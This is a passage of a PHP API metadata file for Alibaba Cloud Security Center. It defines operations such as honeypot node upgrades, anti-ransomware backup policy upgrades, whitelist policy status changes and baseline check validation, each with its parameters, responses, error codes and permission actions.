['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"576EF709-71CE-500F-95FC-7F7A297D****\\"\\n}","type":"json"}]', ], 'UpdateWhiteListStrategyStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92456', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains this value.', 'type' => 'string', 'required' => false, 'example' => '219.143.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyIds', 'in' => 'query', 'schema' => ['description' => 'The policy ID.'."\n" .'>Call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '8516', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The policy status. Valid values:'."\n" .'- **0**: Deleted.'."\n" .'- **1**: Learning.'."\n" .'- **2**: Paused.'."\n" .'- **3**: Learning complete.'."\n" .'- **4**: Active.'."\n" ."\n" .'> - Only a policy in the **Learning** state can be changed to the **Paused** state.'."\n" .'> - Only a policy in the **Paused** state can be changed to the **Learning** state.'."\n" .'> - Only a policy in the **Learning complete** state can be changed to the **Active** state.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '379a9b8f-107b-4630-9e95-2299a1ea****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify application whitelist policy status', 'summary' => 'Modifies the status of an application whitelist policy.', 'description' => 'Application whitelist is a China-site public preview feature that no longer accepts new applications. Users who have already applied for or are using this feature can call this operation as usual.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateWhiteListStrategyStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"379a9b8f-107b-4630-9e95-2299a1ea****\\"\\n}","type":"json"}]', ], 'UpgradeBackupPolicyVersion' => [ 'summary' => 'Upgrades the version of an anti-ransomware backup policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas79LA3S'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware protection policy.'."\n" .'>You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '9F5B8057-3E44-54DC-AC89-6814A4CD****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Upgrade anti-ransomware backup policy version', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpgradeBackupPolicyVersion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:UpgradeBackupPolicyVersion', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/{#BackupPolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9F5B8057-3E44-54DC-AC89-6814A4CD****\\"\\n}","type":"json"}]', ], 'UpgradeHoneypotNode' => [ 'summary' => 'Upgrades the version of a specified honeypot management node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'chargeType' => 'free', 'abilityTreeCode' => '160476', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'autoTest' => false, ], 'parameters' => [ [ 'name' => 'AllowHoneypotAccessInternet', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to allow the honeypot to access the Internet. Valid values:'."\n" .'- **true**: Allowed.'."\n" .'- **false**: Not allowed.', 'type' => 'boolean', 'required' => false, 'example' => 'true'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node to upgrade.'."\n" .'>You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message of the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'F832F2D0-C4CD-507B-8C14-CE1F25A7*****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Upgrade honeypot management node version', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:UpgradeHoneypotNode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F832F2D0-C4CD-507B-8C14-CE1F25A7*****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpgradeVersionByUuids' => [ 'summary' => 'Manually upgrades the client of an asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '142152', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of UUIDs of the assets to be checked.', 'type' => 'array', 'items' => ['description' => 'The UUID of the asset to be checked.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of a server.', 'type' => 'string', 'required' => true, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], [ 'name' => 'UpgradeVersion', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The target version to which you want to upgrade.', 'type' => 'string', 'required' => true, 'example' => '0.0.9', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Manually upgrade client', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpgradeVersionByUuids'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpgradeVersionByUuids', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'UploadedHoneyPotFile' => [ 'summary' => 'Creates and confirms a record after a honeypot file is uploaded.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'FileKey', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The FileKey used to upload the file.'."\n" .'> Format: HONEYPOT_FILE/{timestamp}_{custom_file_name}.', 'type' => 'string', 'required' => true, 'example' => 'HONEYPOT_FILE/1601097845544644_********'], ], [ 'name' => 'FileName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the uploaded file.', 'type' => 'string', 'required' => true, 'example' => 'trojan.zip'], ], [ 'name' => 'FileType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The file type.', 'type' => 'string', 'required' => true, 'example' => 'application/zip'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot management node.'."\n" .'> Call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to obtain this value.', 'type' => 'string', 'required' => false, 'example' => 'cc427e14-f257-4670-9d2b-d83bbbe*****'], ], [ 'name' => 'TemplateExtra', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The template prompt corresponding to the uploaded file.', 'type' => 'string', 'required' => true, 'example' => '{\\"help\\":\\".zip\\",\\"label\\":\\"file\\",\\"type\\":\\"file\\",\\"key\\":\\"ftpfiles.zip\\"}'], ], [ 'name' => 'HoneypotImageName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot image.', 'type' => 'string', 'required' => true, 'example' => 'ruoyi'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '427F89F8-6DFE-57CC-9593-3487CA93****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Upload a honeypot file and create a confirmed record', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UploadedHoneyPotFile', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"427F89F8-6DFE-57CC-9593-3487CA93****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ValidateHcWarnings' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92458', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'RiskIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the risk items to verify. Separate multiple IDs with commas (,).'."\n" .'> You can call the [DescribeCheckWarnings](~~DescribeCheckWarnings~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '43', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to verify. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain server UUIDs.', 'type' => 'string', 'required' => false, 'example' => '78645c8e-2e89-441b-8eb***,a9622a6b-adb5-4dd3-929e,0136460a-1cb5-44e8-****', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the check items. Separate multiple check item IDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to obtain check item IDs.', 'type' => 'string', 'required' => false, 'example' => '695,234', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the check item to verify. Valid values:'."\n" ."\n" .'- 1: not passed'."\n" .'- 3: passed'."\n" .'- 5: expired.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '722C4F88-7867-4E7B-8ADE-7451053', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'HcVerifyingRisk', 'errorMessage' => 'risk is verifying', 'description' => ''], ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Batch verify baseline check risk items', 'summary' => 'Verifies existing baseline risks. If the verification passes, the status of the risk items is updated to passed.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ValidateHcWarnings'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ValidateHcWarnings', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"722C4F88-7867-4E7B-8ADE-7451053\\"\\n}","type":"json"}]', ], 'VerifyCheckCustomConfig' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226868', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '76', 'title' => ''], ], [ 'name' => 'CustomConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of custom parameter configuration items for the check item.', 'type' => 'array', 'items' => [ 'description' => 'The list of custom configuration items for the check item.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the custom configuration item for the check item. The name is unique within the check item.', 'type' => 'string', 'required' => false, 'example' => 'IPList', 'title' => ''], 'Value' => ['description' => 'The user-configured value string of the custom configuration item for the check item.', 'type' => 'string', 'required' => false, 'example' => '10.12.4.XX'."\n", 'title' => ''], 'Operation' => ['description' => 'The operation type of the custom configuration item for the check item. Set this parameter to DELETE only for deletion operations. You do not need to specify this parameter for creation or update operations.', 'type' => 'string', 'required' => false, 'example' => 'DELETE', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RepairConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The repair parameters supported by the repair feature of the check item.', 'type' => 'array', 'items' => [ 'description' => 'The repair parameters supported by the repair feature of the check item.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the repair parameter for the check item. The name is unique within the check item.', 'type' => 'string', 'required' => false, 'example' => 'IPLists', 'title' => ''], 'Value' => ['description' => 'The user-configured value string of the repair configuration item for the check item.', 'type' => 'string', 'required' => false, 'example' => '172.26.49.XX', 'title' => ''], 'FlowId' => ['description' => 'The ID of the repair flow that corresponds to the repair operation.', 'type' => 'string', 'required' => false, 'example' => '7fec0a3395b345c18f108ffc9fc0****', 'title' => ''], 'Operation' => ['description' => 'The operation type of the custom configuration item for the check item. Set this parameter to DELETE only for deletion operations. You do not need to specify this parameter for creation or update operations.', 'type' => 'string', 'required' => false, 'example' => 'DELETE', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The validation type for Threat Detection Service parameters. Valid values:'."\n" .'- **REPAIR_CONFIG**: repair and custom parameter validation (default).'."\n" .'- **CHECK_ITEM_CONFIG**: custom check item validation.', 'type' => 'string', 'required' => false, 'example' => 'REPAIR_CONFIG', 'title' => ''], ], [ 'name' => 'CustomCheckConfig', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The input parameters for custom check item validation.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The cloud asset vendor. Valid values:'."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **HUAWEICLOUD**: Huawei Cloud'."\n" .'- **Azure**: Microsoft Azure'."\n" .'- **AWS**: Amazon Web Services (AWS).', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'InstanceType' => ['description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: server'."\n" .'- **SLB**: load balancing'."\n" .'- **RDS**: ApsaraDB RDS database'."\n" .'- **MONGODB**: ApsaraDB for MongoDB database'."\n" .'- **KVSTORE**: ApsaraDB for Redis database'."\n" .'- **ACR**: ACR'."\n" .'- **CSK**: CSK'."\n" .'- **VPC**: VPC'."\n" .'- **ACTIONTRAIL**: ActionTrail'."\n" .'- **CDN**: CDN'."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'- **RDC**: Apsara Devops'."\n" .'- **RAM**: RAM'."\n" .'- **DDOS**: distributed deny of service'."\n" .'- **WAF**: WAF'."\n" .'- **OSS**: access control'."\n" .'- **POLARDB**: POLARDB'."\n" .'- **POSTGRESQL**: PostgreSQL'."\n" .'- **MSE**: MSE'."\n" .'- **NAS**: NAS'."\n" .'- **SDDP**: SDDP'."\n" .'- **EIP**: EIP.', 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => ''], 'InstanceSubType' => ['description' => 'The asset subtype of the cloud service.', 'type' => 'string', 'required' => false, 'example' => 'DISK', 'title' => ''], 'CheckRule' => ['description' => 'The definition rule of the custom check item.', 'type' => 'string', 'required' => false, 'example' => '{"AssociatedData":{"ToDataList":[{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","FromPropertyPath":"InstanceId"}]},"MatchProperty":{"Operator":"AND","MatchProperties":[{"DataName":"ACS_ECS_Disk","PropertyPath":"DiskId","MatchOperator":"EQ","MatchPropertyValue":"testId"}]}}', 'title' => ''], 'CloudAssetInstance' => [ 'description' => 'The asset instance on which you want to test the rule.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 'i-0jl4mjgl261cfrz5****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the instance.', 'type' => 'string', 'required' => false, 'example' => 'ap-southeast-1', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response struct.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****'], 'ErrorCheckConfigs' => [ 'description' => 'The list of check parameters that have configuration check errors.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the custom configuration item for the check item. The name is unique within the check item.', 'type' => 'string', 'example' => 'IpList', 'title' => ''], 'Value' => ['description' => 'The user-configured value string of the custom configuration item for the check item.', 'type' => 'string', 'example' => '10.12.4.XX', 'title' => ''], 'Type' => ['description' => 'The type of the parameter that has an error. Valid values:'."\n" .'- custom: custom configuration parameter.', 'type' => 'string', 'example' => 'custom', 'title' => ''], 'ErrorCode' => ['description' => 'The error code.', 'type' => 'string', 'example' => 'ConfigEqualIllegal', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message.', 'type' => 'string', 'example' => 'Custom parameter is not equal to corresponding check parameter', 'title' => ''], 'LinkErrorConfigs' => [ 'description' => 'The related configurations that caused this error.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the check item configuration. The name is unique within the check item.', 'type' => 'string', 'example' => 'IpLists', 'title' => ''], 'ShowName' => ['description' => 'The display name of the user check configuration.', 'type' => 'string', 'example' => 'IP Lists', 'title' => ''], 'Type' => ['description' => 'The type of the parameter that has an error. Valid values:'."\n" .'- repair: repair parameter'."\n" .'- custom: custom configuration parameter.', 'type' => 'string', 'example' => 'repair', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ErrorRepairConfigs' => [ 'description' => 'The list of repair parameters that have configuration check errors.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the repair configuration item for the check item. The name is unique within the check item.', 'type' => 'string', 'example' => 'IpLists', 'title' => ''], 'Value' => ['description' => 'The name of the repair parameter for the check item. The name is unique within the check item.', 'type' => 'string', 'example' => '172.26.49.XX'."\n", 'title' => ''], 'Type' => ['description' => 'The type of the parameter that has an error. Valid values:'."\n" .'- repair: repair parameter.', 'type' => 'string', 'example' => 'repair', 'title' => ''], 'ErrorCode' => ['description' => 'The error code.', 'type' => 'string', 'example' => 'ConfigEqualIllegal', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message.', 'type' => 'string', 'example' => 'Repair parameter is not equal to corresponding check parameter', 'title' => ''], 'LinkErrorConfigs' => [ 'description' => 'The related configurations that caused this error.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the check item configuration. The name is unique within the check item.', 'type' => 'string', 'example' => 'IpList', 'title' => ''], 'ShowName' => ['description' => 'The display name of the user check configuration.', 'type' => 'string', 'example' => 'Ip List', 'title' => ''], 'Type' => ['description' => 'The type of the parameter that has an error. Valid values:'."\n" .'- repair: repair parameter'."\n" .'- custom: custom configuration parameter.', 'type' => 'string', 'example' => 'custom', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ErrorCheckCustomConfig' => [ 'description' => 'The error code returned for the custom check item validation.', 'type' => 'object', 'properties' => [ 'ErrorCode' => ['description' => 'The error code returned upon failure. This parameter is not returned upon success. Valid values:'."\n" .'- **CspmVerifyCheckCustomItemNoPass**: The asset did not pass the custom rule that was configured.'."\n" .'- **CspmVerifyCheckCustomItemError**: A validation error occurred because the input rule has issues.', 'type' => 'string', 'example' => 'CspmVerifyCheckCustomItemNoPass', 'title' => ''], 'ErrorMsg' => ['description' => 'The exception information.', 'type' => 'string', 'example' => 'Creation verification failed.', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'CspmVerifyItemRuleError.%s', 'errorMessage' => 'Audit check item check rule error: %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Validate threat detection service custom configuration', 'summary' => 'Authenticates whether the configuration information entered by a user is compliant with the requirements of the corresponding parameter settings.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckCustomConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:VerityCheckCustomConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"ErrorCheckConfigs\\": [\\n {\\n \\"Name\\": \\"IpList\\",\\n \\"Value\\": \\"10.12.4.XX\\",\\n \\"Type\\": \\"custom\\",\\n \\"ErrorCode\\": \\"ConfigEqualIllegal\\",\\n \\"ErrorMsg\\": \\"Custom parameter is not equal to corresponding check parameter\\",\\n 